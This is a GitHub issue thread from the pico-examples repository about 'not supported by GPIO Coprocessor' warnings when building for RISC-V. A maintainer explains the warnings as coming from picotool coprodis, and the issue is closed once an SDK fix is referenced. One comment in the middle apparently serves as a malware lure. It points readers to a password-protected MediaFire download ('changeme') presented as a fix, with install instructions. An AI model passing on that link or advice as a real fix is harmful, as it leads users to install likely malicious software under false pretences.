raspberrypi/pico-examples #533: Coprocessor warnings when building for RISCV

lurch, 2024-08-27:
If I try building pico-examples for `rp2350-riscv` then I get this build warning:
```
[540/738] Linking CXX executable scanvideo/hscroll_dma_tiles/hscroll_dma_tiles.elf
WARNING: Instruction mrc 0, #7, r8, c7, c15, #0 is not supported by GPIO Coprocessor
WARNING: Instruction mrc 0, #7, r8, c7, c15, #0 is not supported by GPIO Coprocessor
WARNING: Instruction mrc 0, #7, r8, c7, c15, #0 is not supported by GPIO Coprocessor
[655/738] Linking CXX executable scanvideo/mario_tiles/mario_tiles.elf
WARNING: Instruction mrc 0, #7, r8, c7, c15, #0 is not supported by GPIO Coprocessor
WARNING: Instruction mrc 0, #7, r8, c7, c15, #0 is not supported by GPIO Coprocessor
WARNING: Instruction mrc 0, #7, r8, c7, c15, #0 is not supported by GPIO Coprocessor
[738/738] Linking CXX executable stdio/pio/stdio_pio.elf
```
(and I'm afraid I've got no idea what it means or how significant it is!)

ahmar7, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

will-v-pi, 2024-08-27:
Those are warnings from `picotool coprodis` - looks like coprocessor dissassembly is running on Risc-V binaries, when it should only be running on RP2350 Arm binaries - I'll push a PR to the SDK to fix this, but you can ignore those warnings for now

lurch, 2024-08-27:
I'll close this then, in light of https://github.com/raspberrypi/pico-sdk/pull/1875 :+1:

closed 2024-08-27 by lurch